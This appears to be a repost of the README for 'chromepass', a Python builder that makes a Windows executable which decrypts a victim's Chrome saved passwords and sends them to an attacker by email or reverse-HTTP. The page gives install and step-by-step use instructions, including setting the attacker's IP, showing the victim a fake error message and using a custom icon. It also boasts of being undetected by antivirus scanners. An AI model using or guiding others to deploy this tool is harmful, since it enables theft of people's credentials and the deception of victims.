chromepass: Gather Chrome Saved Passwords
Chromepass – Hacking Chrome Saved Passwords
Chromepass is a python-based console application that generates a windows executable with the following features:
- Decrypt Chrome saved passwords
- Send a file with the login/password combinations remotely (email or reverse-http)
- Custom icon
- Completely undetectable by AntiVirus Engines
AV Detection!
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites
- VirusTotal Scan (0/68) 30-09-2019
- this is an educational project, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
- AntiScan (0/26) 24-09-2019
- Hibrid Analysis All Clean (CrowdStrike Falcon, MetaDefender and Virustotal) 24-09-2019
Install
git clone https://github.com/darkarp/chromepass.git
cd chromepass
pip install -r requirements.txt
Use
python create_server.py
It will ask you to select between two options:
- (1) via email [To be fixed]
- This will ask you for an email address and a password
- It will then ask you if you wish to send to another address or to yourself
- Next, you’re asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
- You can then write your own message or leave it blank
- You’re done! Wait for the executable to be generated and then it’s ready.
- (2) via client.exe [Recommended at the moment]
- First, you’re asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
- You’re then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
- You can then write your own message or leave it blank
- You’re done! Wait for the executables to be generated and then it’s ready.
- The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
- Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.
Copyright (c) 2019 Mario Nascimento
Source: https://github.com/darkarp/